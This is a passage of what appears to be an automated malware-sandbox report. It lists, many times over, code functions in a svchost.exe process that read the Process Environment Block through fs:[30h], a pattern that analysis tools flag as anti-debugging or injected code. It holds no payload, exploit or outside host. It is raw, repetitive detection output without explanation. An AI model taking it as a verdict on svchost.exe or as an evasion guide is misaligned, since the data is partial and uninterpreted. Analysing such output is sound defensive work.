          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B2BC mov eax, dword ptr fs:[00000030h]2_2_0370B2BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B2BC mov eax, dword ptr fs:[00000030h]2_2_0370B2BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370B2BC mov eax, dword ptr fs:[00000030h]2_2_0370B2BC
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036292AF mov eax, dword ptr fs:[00000030h]2_2_036292AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C2B0 mov ecx, dword ptr fs:[00000030h]2_2_0362C2B0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036AE289 mov eax, dword ptr fs:[00000030h]2_2_036AE289
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03637290 mov eax, dword ptr fs:[00000030h]2_2_03637290
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03637290 mov eax, dword ptr fs:[00000030h]2_2_03637290
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03637290 mov eax, dword ptr fs:[00000030h]2_2_03637290
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366716D mov eax, dword ptr fs:[00000030h]2_2_0366716D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368717A mov eax, dword ptr fs:[00000030h]2_2_0368717A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0368717A mov eax, dword ptr fs:[00000030h]2_2_0368717A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636179 mov eax, dword ptr fs:[00000030h]2_2_03636179
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A147 mov eax, dword ptr fs:[00000030h]2_2_0362A147
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A147 mov eax, dword ptr fs:[00000030h]2_2_0362A147
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A147 mov eax, dword ptr fs:[00000030h]2_2_0362A147
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C314A mov eax, dword ptr fs:[00000030h]2_2_036C314A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C314A mov eax, dword ptr fs:[00000030h]2_2_036C314A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C314A mov eax, dword ptr fs:[00000030h]2_2_036C314A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036C314A mov eax, dword ptr fs:[00000030h]2_2_036C314A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703157 mov eax, dword ptr fs:[00000030h]2_2_03703157
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703157 mov eax, dword ptr fs:[00000030h]2_2_03703157
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03703157 mov eax, dword ptr fs:[00000030h]2_2_03703157
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03705149 mov eax, dword ptr fs:[00000030h]2_2_03705149
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366415F mov eax, dword ptr fs:[00000030h]2_2_0366415F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03667128 mov eax, dword ptr fs:[00000030h]2_2_03667128
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03667128 mov eax, dword ptr fs:[00000030h]2_2_03667128
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF13E mov eax, dword ptr fs:[00000030h]2_2_036EF13E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036BA130 mov eax, dword ptr fs:[00000030h]2_2_036BA130
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365510F mov eax, dword ptr fs:[00000030h]2_2_0365510F
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363510D mov eax, dword ptr fs:[00000030h]2_2_0363510D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F113 mov eax, dword ptr fs:[00000030h]2_2_0362F113
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660118 mov eax, dword ptr fs:[00000030h]2_2_03660118
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A1E3 mov eax, dword ptr fs:[00000030h]2_2_0363A1E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A1E3 mov eax, dword ptr fs:[00000030h]2_2_0363A1E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A1E3 mov eax, dword ptr fs:[00000030h]2_2_0363A1E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A1E3 mov eax, dword ptr fs:[00000030h]2_2_0363A1E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363A1E3 mov eax, dword ptr fs:[00000030h]2_2_0363A1E3
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F81EE mov eax, dword ptr fs:[00000030h]2_2_036F81EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F81EE mov eax, dword ptr fs:[00000030h]2_2_036F81EE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B1E0 mov eax, dword ptr fs:[00000030h]2_2_0365B1E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B1E0 mov eax, dword ptr fs:[00000030h]2_2_0365B1E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B1E0 mov eax, dword ptr fs:[00000030h]2_2_0365B1E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B1E0 mov eax, dword ptr fs:[00000030h]2_2_0365B1E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B1E0 mov eax, dword ptr fs:[00000030h]2_2_0365B1E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B1E0 mov eax, dword ptr fs:[00000030h]2_2_0365B1E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365B1E0 mov eax, dword ptr fs:[00000030h]2_2_0365B1E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036391E5 mov eax, dword ptr fs:[00000030h]2_2_036391E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036391E5 mov eax, dword ptr fs:[00000030h]2_2_036391E5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036281EB mov eax, dword ptr fs:[00000030h]2_2_036281EB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036291F0 mov eax, dword ptr fs:[00000030h]2_2_036291F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036291F0 mov eax, dword ptr fs:[00000030h]2_2_036291F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036401F1 mov eax, dword ptr fs:[00000030h]2_2_036401F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036401F1 mov eax, dword ptr fs:[00000030h]2_2_036401F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036401F1 mov eax, dword ptr fs:[00000030h]2_2_036401F1
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365F1F0 mov eax, dword ptr fs:[00000030h]2_2_0365F1F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365F1F0 mov eax, dword ptr fs:[00000030h]2_2_0365F1F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036401C0 mov eax, dword ptr fs:[00000030h]2_2_036401C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036401C0 mov eax, dword ptr fs:[00000030h]2_2_036401C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036451C0 mov eax, dword ptr fs:[00000030h]2_2_036451C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036451C0 mov eax, dword ptr fs:[00000030h]2_2_036451C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036451C0 mov eax, dword ptr fs:[00000030h]2_2_036451C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036451C0 mov eax, dword ptr fs:[00000030h]2_2_036451C0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E1A4 mov eax, dword ptr fs:[00000030h]2_2_0366E1A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366E1A4 mov eax, dword ptr fs:[00000030h]2_2_0366E1A4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037051B6 mov eax, dword ptr fs:[00000030h]2_2_037051B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036631BE mov eax, dword ptr fs:[00000030h]2_2_036631BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036631BE mov eax, dword ptr fs:[00000030h]2_2_036631BE
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036641BB mov ecx, dword ptr fs:[00000030h]2_2_036641BB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036641BB mov eax, dword ptr fs:[00000030h]2_2_036641BB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036641BB mov eax, dword ptr fs:[00000030h]2_2_036641BB
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634180 mov eax, dword ptr fs:[00000030h]2_2_03634180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634180 mov eax, dword ptr fs:[00000030h]2_2_03634180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634180 mov eax, dword ptr fs:[00000030h]2_2_03634180
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03659194 mov eax, dword ptr fs:[00000030h]2_2_03659194
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03671190 mov eax, dword ptr fs:[00000030h]2_2_03671190
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03671190 mov eax, dword ptr fs:[00000030h]2_2_03671190
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036D9060 mov eax, dword ptr fs:[00000030h]2_2_036D9060
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03637072 mov eax, dword ptr fs:[00000030h]2_2_03637072
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636074 mov eax, dword ptr fs:[00000030h]2_2_03636074
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03636074 mov eax, dword ptr fs:[00000030h]2_2_03636074
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660044 mov eax, dword ptr fs:[00000030h]2_2_03660044
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0370505B mov eax, dword ptr fs:[00000030h]2_2_0370505B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03631051 mov eax, dword ptr fs:[00000030h]2_2_03631051
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03631051 mov eax, dword ptr fs:[00000030h]2_2_03631051
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362D02D mov eax, dword ptr fs:[00000030h]2_2_0362D02D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03655004 mov eax, dword ptr fs:[00000030h]2_2_03655004
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03655004 mov ecx, dword ptr fs:[00000030h]2_2_03655004
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03638009 mov eax, dword ptr fs:[00000030h]2_2_03638009
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03672010 mov ecx, dword ptr fs:[00000030h]2_2_03672010
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C0F6 mov eax, dword ptr fs:[00000030h]2_2_0362C0F6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366D0F0 mov eax, dword ptr fs:[00000030h]2_2_0366D0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366D0F0 mov ecx, dword ptr fs:[00000030h]2_2_0366D0F0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036290F8 mov eax, dword ptr fs:[00000030h]2_2_036290F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036290F8 mov eax, dword ptr fs:[00000030h]2_2_036290F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036290F8 mov eax, dword ptr fs:[00000030h]2_2_036290F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036290F8 mov eax, dword ptr fs:[00000030h]2_2_036290F8
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0364B0D0 mov eax, dword ptr fs:[00000030h]2_2_0364B0D0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362B0D6 mov eax, dword ptr fs:[00000030h]2_2_0362B0D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362B0D6 mov eax, dword ptr fs:[00000030h]2_2_0362B0D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362B0D6 mov eax, dword ptr fs:[00000030h]2_2_0362B0D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362B0D6 mov eax, dword ptr fs:[00000030h]2_2_0362B0D6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EB0AF mov eax, dword ptr fs:[00000030h]2_2_036EB0AF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036700A5 mov eax, dword ptr fs:[00000030h]2_2_036700A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037050B7 mov eax, dword ptr fs:[00000030h]2_2_037050B7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF0A5 mov eax, dword ptr fs:[00000030h]2_2_036DF0A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF0A5 mov eax, dword ptr fs:[00000030h]2_2_036DF0A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF0A5 mov eax, dword ptr fs:[00000030h]2_2_036DF0A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF0A5 mov eax, dword ptr fs:[00000030h]2_2_036DF0A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF0A5 mov eax, dword ptr fs:[00000030h]2_2_036DF0A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF0A5 mov eax, dword ptr fs:[00000030h]2_2_036DF0A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DF0A5 mov eax, dword ptr fs:[00000030h]2_2_036DF0A5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704080 mov eax, dword ptr fs:[00000030h]2_2_03704080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704080 mov eax, dword ptr fs:[00000030h]2_2_03704080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704080 mov eax, dword ptr fs:[00000030h]2_2_03704080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704080 mov eax, dword ptr fs:[00000030h]2_2_03704080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704080 mov eax, dword ptr fs:[00000030h]2_2_03704080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704080 mov eax, dword ptr fs:[00000030h]2_2_03704080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03704080 mov eax, dword ptr fs:[00000030h]2_2_03704080
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362A093 mov ecx, dword ptr fs:[00000030h]2_2_0362A093
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362C090 mov eax, dword ptr fs:[00000030h]2_2_0362C090
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03642760 mov ecx, dword ptr fs:[00000030h]2_2_03642760
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03671763 mov eax, dword ptr fs:[00000030h]2_2_03671763
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03671763 mov eax, dword ptr fs:[00000030h]2_2_03671763
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03671763 mov eax, dword ptr fs:[00000030h]2_2_03671763
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03671763 mov eax, dword ptr fs:[00000030h]2_2_03671763
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03671763 mov eax, dword ptr fs:[00000030h]2_2_03671763
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03671763 mov eax, dword ptr fs:[00000030h]2_2_03671763
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03660774 mov eax, dword ptr fs:[00000030h]2_2_03660774
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634779 mov eax, dword ptr fs:[00000030h]2_2_03634779
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03634779 mov eax, dword ptr fs:[00000030h]2_2_03634779
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03663740 mov eax, dword ptr fs:[00000030h]2_2_03663740
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366174A mov eax, dword ptr fs:[00000030h]2_2_0366174A
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652755 mov eax, dword ptr fs:[00000030h]2_2_03652755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652755 mov eax, dword ptr fs:[00000030h]2_2_03652755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652755 mov eax, dword ptr fs:[00000030h]2_2_03652755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652755 mov ecx, dword ptr fs:[00000030h]2_2_03652755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652755 mov eax, dword ptr fs:[00000030h]2_2_03652755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03652755 mov eax, dword ptr fs:[00000030h]2_2_03652755
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0366A750 mov eax, dword ptr fs:[00000030h]2_2_0366A750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F75B mov eax, dword ptr fs:[00000030h]2_2_0362F75B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F75B mov eax, dword ptr fs:[00000030h]2_2_0362F75B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F75B mov eax, dword ptr fs:[00000030h]2_2_0362F75B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F75B mov eax, dword ptr fs:[00000030h]2_2_0362F75B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F75B mov eax, dword ptr fs:[00000030h]2_2_0362F75B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F75B mov eax, dword ptr fs:[00000030h]2_2_0362F75B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F75B mov eax, dword ptr fs:[00000030h]2_2_0362F75B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F75B mov eax, dword ptr fs:[00000030h]2_2_0362F75B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362F75B mov eax, dword ptr fs:[00000030h]2_2_0362F75B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036DE750 mov eax, dword ptr fs:[00000030h]2_2_036DE750
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03659723 mov eax, dword ptr fs:[00000030h]2_2_03659723
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363D700 mov ecx, dword ptr fs:[00000030h]2_2_0363D700
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F970B mov eax, dword ptr fs:[00000030h]2_2_036F970B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036F970B mov eax, dword ptr fs:[00000030h]2_2_036F970B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362B705 mov eax, dword ptr fs:[00000030h]2_2_0362B705
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362B705 mov eax, dword ptr fs:[00000030h]2_2_0362B705
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362B705 mov eax, dword ptr fs:[00000030h]2_2_0362B705
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0362B705 mov eax, dword ptr fs:[00000030h]2_2_0362B705
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365270D mov eax, dword ptr fs:[00000030h]2_2_0365270D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365270D mov eax, dword ptr fs:[00000030h]2_2_0365270D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365270D mov eax, dword ptr fs:[00000030h]2_2_0365270D
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363471B mov eax, dword ptr fs:[00000030h]2_2_0363471B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0363471B mov eax, dword ptr fs:[00000030h]2_2_0363471B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF717 mov eax, dword ptr fs:[00000030h]2_2_036EF717
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0365E7E0 mov eax, dword ptr fs:[00000030h]2_2_0365E7E0
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036337E4 mov eax, dword ptr fs:[00000030h]2_2_036337E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036337E4 mov eax, dword ptr fs:[00000030h]2_2_036337E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036337E4 mov eax, dword ptr fs:[00000030h]2_2_036337E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036337E4 mov eax, dword ptr fs:[00000030h]2_2_036337E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036337E4 mov eax, dword ptr fs:[00000030h]2_2_036337E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036337E4 mov eax, dword ptr fs:[00000030h]2_2_036337E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036337E4 mov eax, dword ptr fs:[00000030h]2_2_036337E4
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036377F9 mov eax, dword ptr fs:[00000030h]2_2_036377F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036377F9 mov eax, dword ptr fs:[00000030h]2_2_036377F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036EF7CF mov eax, dword ptr fs:[00000030h]2_2_036EF7CF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036307A7 mov eax, dword ptr fs:[00000030h]2_2_036307A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FD7A7 mov eax, dword ptr fs:[00000030h]2_2_036FD7A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FD7A7 mov eax, dword ptr fs:[00000030h]2_2_036FD7A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_036FD7A7 mov eax, dword ptr fs:[00000030h]2_2_036FD7A7
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_037017BC mov eax, dword ptr fs:[00000030h]2_2_037017BC
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03661796 mov eax, dword ptr fs:[00000030h] | 2_2_03661796
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03661796 mov eax, dword ptr fs:[00000030h] | 2_2_03661796
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370B781 mov eax, dword ptr fs:[00000030h] | 2_2_0370B781
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_0370B781 mov eax, dword ptr fs:[00000030h] | 2_2_0370B781
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h] | 2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h] | 2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h] | 2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h] | 2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h] | 2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h] | 2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h] | 2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h] | 2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_036AE79D mov eax, dword ptr fs:[00000030h] | 2_2_036AE79D
          Source: C:\Windows\SysWOW64\svchost.exe | Code function: 2_2_03627662 mov eax, dword ptr fs:[00000030h] | 2_2_03627662
